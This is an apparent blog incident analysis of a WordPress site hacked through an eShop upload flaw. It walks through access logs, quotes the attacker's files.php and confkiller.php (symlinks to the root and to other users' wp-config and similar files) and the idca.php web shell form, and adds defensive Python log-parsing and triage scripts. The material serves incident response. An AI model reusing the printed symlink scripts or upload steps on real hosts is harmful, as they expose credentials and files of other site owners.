Track anonymous hacker (Hacked WordPress with eShop Plugin)

Following on from articles [1] and [2], Case Study: Web sites hacked, WordPress hacked and tracing the hacker,
this time let's look at the details from the access_log file.

### –> START: ACCESS YOUR SITE ###

```
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=2.0.4.1 HTTP/1.1" 200 5615
180.244.249.92 - - [28/May/2013:14:48:25 +0700] "GET /category/coffee/bean/ HTTP/1.1" 200 50899
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/slider.css HTTP/1.1" 200 2474
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/superfish.css HTTP/1.1" 200 3633
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/thickbox.css HTTP/1.1" 200 4014
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/style.css HTTP/1.1" 200 35201
```

### –> START ATTACKING ###
The attacker opened the site path /wp-content/themes/อีช้อปปิ้ง/upload/upload.php, using a vulnerability in the plugin, and uploaded a script file (idca.php). The file is obfuscated with more than one encoding function.
They then invoked the script with the path they wanted to browse (?y = the default path where the site's files are stored).

```
180.244.249.92 - - [28/May/2013:14:48:47 +0700] "POST /wp-content/themes/อีช้อปปิ้ง/upload/upload.php?img=&nonce= HTTP/1.1" 200 169
180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 4042
180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -
180.244.249.92 - - [28/May/2013:14:49:08 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -
180.244.249.92 - - [28/May/2013:14:49:15 +0700] "POST /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:49:21 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904
180.244.249.92 - - [28/May/2013:14:49:39 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904
```

### –> [1] END ATTACKED SUCCESS ###
The attacker kept probing until they could call the upload function of the idca.php script, then used it to upload further script files into the root directory of each domain.

```
180.244.249.92 - - [28/May/2013:14:49:41 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/ HTTP/1.1" 200 27718
180.244.249.92 - - [28/May/2013:14:49:44 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:49:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880
180.244.249.92 - - [28/May/2013:14:49:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:49:59 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:50:02 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 121198
180.244.249.92 - - [28/May/2013:14:50:05 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:50:10 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13730
180.244.249.92 - - [28/May/2013:14:50:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124263
180.244.249.92 - - [28/May/2013:14:51:07 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383
180.244.249.92 - - [28/May/2013:14:51:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383
180.244.249.92 - - [28/May/2013:14:51:18 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 12513
180.244.249.92 - - [28/May/2013:14:51:27 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 46661
```

### –> [2] END ATTACKED SUCCESS ###
It looks like a small team at work: a second address was simultaneously trying to break into the WordPress admin login.

[Indonesian and China]

```
180.244.249.92 - - [28/May/2013:14:53:12 +0700] "GET /files.php HTTP/1.1" 200 2832
142.4.101.26 - - [28/May/2013:14:53:12 +0700] "GET /wp-login.php HTTP/1.0" 200 2245
```

The upload of files.php succeeded.

```
180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202
142.4.101.26 - - [28/May/2013:14:53:13 +0700] "POST /wp-login.php HTTP/1.0" 302 -
180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
```

### –> [3] END ATTACKED SUCCESS ###
A further file, confkiller.php, was uploaded.

```
180.244.249.92 - - [28/May/2013:14:53:21 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:53:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 129458
180.244.249.92 - - [28/May/2013:14:53:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:53:32 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13734
180.244.249.92 - - [28/May/2013:14:53:42 +0700] "POST /confkiller.php HTTP/1.1" 200 5422   #<--Hacker: upload file name "files.php"
180.244.249.92 - - [28/May/2013:14:53:43 +0700] "POST /confkiller.php HTTP/1.1" 200 5243   #<--Hacker: upload file name "confkiller.php"
```

### –> [4] END ATTACKED SUCCESS ###
The confkiller.php script was then executed by calling it from the web browser.

```
180.244.249.92 - - [28/May/2013:14:53:45 +0700] "GET /INDISHELL/ HTTP/1.1" 200 705
180.244.249.92 - - [28/May/2013:14:54:09 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:11 +0700] "GET /confkiller.php HTTP/1.1" 200 4842
180.244.249.92 - - [28/May/2013:14:54:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:54:15 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 136865
180.244.249.92 - - [28/May/2013:14:54:20 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:54:23 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:25 +0700] "GET /files.php?sws=passwd HTTP/1.1" 200 5520
**************
180.244.249.92 - - [28/May/2013:14:54:26 +0700] "POST /files.php?sws=passwd&save=1 HTTP/1.1" 200 21005
**************
180.244.249.92 - - [28/May/2013:14:54:29 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:34 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=joomla HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=wp HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=vb HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:41 +0700] "GET /files.php? HTTP/1.1" 200 2832
```

And that was it for the homepage.

### –> [5] START: ATTACK UNSUCCESSFUL ###
The attacker went on to try the remaining domains on the host.

```
**************
180.244.249.92 - - [28/May/2013:14:54:48 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880
**************
180.244.249.92 - - [28/May/2013:14:54:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/ HTTP/1.1" 200 30970
180.244.249.92 - - [28/May/2013:14:55:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:55:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&x=upload HTTP/1.1" 200 14128
180.244.249.92 - - [28/May/2013:14:55:57 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&x=upload HTTP/1.1" 200 14155
180.244.249.92 - - [28/May/2013:14:56:04 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:56:15 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:56:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:56:55 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/ HTTP/1.1" 200 17516
180.244.249.92 - - [28/May/2013:14:57:16 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/ HTTP/1.1" 200 28180
180.244.249.92 - - [28/May/2013:14:57:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/ HTTP/1.1" 200 146442
180.244.249.92 - - [28/May/2013:14:57:31 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&x=upload HTTP/1.1" 200 13852
180.244.249.92 - - [28/May/2013:14:57:37 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&x=upload HTTP/1.1" 200 13879
180.244.249.92 - - [28/May/2013:14:57:45 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:57:47 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-D/ HTTP/1.1" 200 47166
```

### –> END: ATTACK UNSUCCESSFUL ###
No luck there. Better go to sleep :-
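The indicators picked out by hand in the log excerpts above can be turned into a mechanical check. The following is an added example, not code from the original post: a small Python parser for access_log lines in the format shown, which tags the request patterns this incident exhibits (a POST to a theme's upload script, PHP served from wp-content/uploads, query values that are absolute filesystem paths, an unknown PHP file at the document root, and POSTs to wp-login.php) and groups the hits per source address. The sample log is constructed from the entries above, with the placeholders `eshop`, `DOMAIN-B` and `shop` standing in for the theme and the redacted domain and site directories; the `KNOWN_ROOT_PHP` allow-list is an assumption for a stock WordPress install.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Apache common-log-style line as in the access_log excerpts above:
# client, identd, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# PHP files that legitimately sit at the document root of a stock WordPress
# install (assumption; extend it for a real site).
KNOWN_ROOT_PHP = {"index.php", "wp-login.php", "xmlrpc.php", "wp-cron.php",
                  "wp-comments-post.php", "wp-trackback.php", "wp-signup.php"}

# Constructed sample modelled on the entries above; "eshop", "DOMAIN-B" and
# "shop" replace the theme and the redacted domain/site directory names.
SAMPLE_LOG = """\
180.244.249.92 - - [28/May/2013:14:48:25 +0700] "GET /category/coffee/bean/ HTTP/1.1" 200 50899
180.244.249.92 - - [28/May/2013:14:48:47 +0700] "POST /wp-content/themes/eshop/upload/upload.php?img=&nonce= HTTP/1.1" 200 169
180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 4042
180.244.249.92 - - [28/May/2013:14:49:21 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/DOMAIN-B/ HTTP/1.1" 200 19904
180.244.249.92 - - [28/May/2013:14:50:10 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/DOMAIN-B/httpd/html/shop/&x=upload HTTP/1.1" 200 13730
142.4.101.26 - - [28/May/2013:14:53:13 +0700] "POST /wp-login.php HTTP/1.0" 302 -
180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:26 +0700] "POST /files.php?sws=passwd&save=1 HTTP/1.1" 200 21005
10.0.0.5 - - [28/May/2013:15:00:00 +0700] "GET /wp-content/uploads/2013/05/logo.png HTTP/1.1" 200 1234
"""


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the indicator tags that apply to one parsed request (empty if benign)."""
    tags = []
    path, query = rec["path"], rec["query"]
    # 1. POST to a theme/plugin 'upload' script: the entry point of this incident.
    if (rec["method"] == "POST" and "/wp-content/" in path
            and "/upload/" in path and path.endswith(".php")):
        tags.append("upload-endpoint-post")
    # 2. PHP executed from the uploads tree, which should only ever hold media.
    if path.startswith("/wp-content/uploads/") and path.lower().endswith(".php"):
        tags.append("php-in-uploads")
    # 3. A query value that is an absolute filesystem path: web-shell directory browsing.
    if any(value.startswith("/") for _, value in query):
        tags.append("fs-path-in-query")
    # 4. A PHP file at the document root that a stock install does not have (dropped file).
    if path.count("/") == 1 and path.endswith(".php") and path[1:] not in KNOWN_ROOT_PHP:
        tags.append("unknown-root-php")
    # 5. Login POSTs, worth correlating with the other source address in the same window.
    if path == "/wp-login.php" and rec["method"] == "POST":
        tags.append("wp-login-post")
    return tags


def analyse(log_text):
    """Group flagged requests by source IP: ip -> [(when, method, target, tags), ...]."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            findings[rec["ip"]].append((rec["when"], rec["method"], rec["target"], tags))
    return dict(findings)


def first_suspicious(log_text):
    """Earliest flagged request across all sources, useful as the incident's start marker."""
    hits = [(when, ip, target, tags)
            for ip, events in analyse(log_text).items()
            for when, _, target, tags in events]
    hits.sort()
    return hits[0] if hits else None


if __name__ == "__main__":
    for ip, events in analyse(SAMPLE_LOG).items():
        print(ip)
        for when, method, target, tags in events:
            print(f"  {when:%H:%M:%S} {method} {target} -> {', '.join(tags)}")
```

Run it against a real access_log by replacing `SAMPLE_LOG` with the file contents; the first hit is normally the upload POST, which is where a timeline reconstruction should begin.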

Sample of the files.php script:

```php
@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f = @fopen('sym/.htaccess','w');
fwrite($f , $htcs);

@symlink("/","sym/root");

$pg = basename(__FILE__);

////////// WordPress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
    $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
    $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}
```

Sample of the confkiller.php script:

```php
<?php
error_reporting(0);
echo "<font color=red size=2 face=\"comic sans ms\">";
if(isset($_POST['su']))
{
    mkdir('Indishell',0777);
    $rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $g = fopen('Indishell/.htaccess','w');
    fwrite($g,$rr);
    $indishell = symlink("/","Indishell/root");
    $rt="<a href=Indishell/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
    echo "Bhai ji .... check link given below for / folder symlink <br><u>$rt</u>";

    $dir=mkdir('INDISHELL',0777);
    $r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $f = fopen('INDISHELL/.htaccess','w');

    fwrite($f,$r);
    $consym="<a href=INDISHELL/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
    echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";

    $usr=explode("\n",$_POST['user']);
    $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
    foreach($usr as $uss )
    {
        $us=trim($uss);

        foreach($configuration as $c)
        {
            $rs="/home/".$us."/public_html/".$c;
            $r="INDISHELL/".$us." .. ".$c;
            symlink($rs,$r);
        }
    }
}
?>
```

Sample of the idca.php script (decoded with unphp.net):

```html
<form method="post">

	<a href="?error"><img src="?favicon" style="margin:2px;vertical-align:middle;" /></a>

<span class="gaya">[email protected]:~#</span><input id="login" class="inputz" type="password" name="pass" style="width:120px;" value="" />

	<input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />

	</form>

	</div>

</td></tr></table>

<form method=post>

<p class="footer">./Cyber404 | Mr-GanDrunX &copy;2013</p>

</form>
```
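The files.php and confkiller.php samples above share one trick: an .htaccess that makes the server emit .php files as plain text, plus symlinks that point at / or at other accounts' configuration files. As an added example (not the page's own code and not the attacker's), here is a Python triage script a responder can run against a document root after such an incident: it reports PHP files under wp-content/uploads, symlinks that resolve outside the document root, and .htaccess files carrying the directives seen in the samples. `build_sample_tree()` constructs a throwaway directory that mimics the layout from the logs (the idca.php content is a harmless stand-in) so the script runs offline; the list of suspect directives is an assumption taken from the two scripts.

```python
import os
import tempfile
from pathlib import Path

# Directives the dropped .htaccess files above use to turn PHP into readable text
# and to disable access control (assumption: taken from files.php / confkiller.php).
SUSPECT_HTACCESS = ("AddHandler", "AddType text/plain .php", "Options all", "Satisfy Any")
PHP_SUFFIXES = (".php", ".phtml", ".php5")


def triage(docroot):
    """Walk docroot and return sorted (kind, relative_path, detail) findings."""
    docroot = Path(docroot).resolve()
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot):  # does not follow symlinks
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            rel = p.relative_to(docroot).as_posix()
            if p.is_symlink():
                # resolve() follows the link even when it leaves the document root
                target = p.resolve()
                if target != docroot and docroot not in target.parents:
                    findings.append(("symlink-escapes-docroot", rel, str(target)))
                continue
            if rel.startswith("wp-content/uploads/") and p.suffix.lower() in PHP_SUFFIXES:
                findings.append(("php-in-uploads", rel, ""))
            if name == ".htaccess":
                text = p.read_text(errors="replace")
                hits = [d for d in SUSPECT_HTACCESS if d in text]
                if hits:
                    findings.append(("suspect-htaccess", rel, ", ".join(hits)))
    return sorted(findings)


def build_sample_tree():
    """Constructed document root mirroring the incident layout; returns its path."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    uploads = root / "wp-content" / "uploads" / "products_img"
    uploads.mkdir(parents=True)
    (uploads / "idca.php").write_text("<?php /* constructed stand-in, not the web shell */ ?>")
    (uploads / "photo.jpg").write_bytes(b"\xff\xd8\xff")
    # A legitimate uploads/.htaccess that blocks PHP execution: must NOT be flagged.
    (root / "wp-content" / "uploads" / ".htaccess").write_text(
        '<FilesMatch "\\.php$">\nDeny from all\n</FilesMatch>\n')
    (root / "index.php").write_text("<?php /* site entry point */ ?>")
    # The 'sym' directory as files.php would leave it behind.
    (root / "sym").mkdir()
    (root / "sym" / ".htaccess").write_text("Options all\nAddType text/plain .php\nSatisfy Any\n")
    os.symlink("/", root / "sym" / "root")
    return root


if __name__ == "__main__":
    for kind, rel, detail in triage(build_sample_tree()):
        print(f"{kind:24} {rel}  {detail}")
```

Point `triage()` at the real document root of each virtual host on the server; anything it reports under `symlink-escapes-docroot` or `suspect-htaccess` should be removed, and the web server should in any case run with `Options -FollowSymLinks` and PHP execution disabled under wp-content/uploads so the trick does not work in the first place.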

In summary, the hacker tried to break into every domain on the web host but only succeeded against the site using the eShop WordPress plugin; there they altered the homepage
and created a link exposing the system's directory listing. An initial check found no sensitive data had leaked. The vulnerability lay in the eShop tool, and the hacker did not use a WordPress vulnerability (but WordPress should still be updated to the latest version).

 

2 Responses to Track anonymous hacker (Hacked WordPress with eShop Plugin)

  1. อุ้ม says:

    Thank you so much for such detailed, useful knowledge. Plugins are scary.

  2. SONTAYA says:

    The plugin just has a bug, that's all. There are plenty of good, useful plugins.

    10 good plugins for WordPress (WordPress SEO plugin to optimize your site)
    //blog.susethailand.com/?p=2860
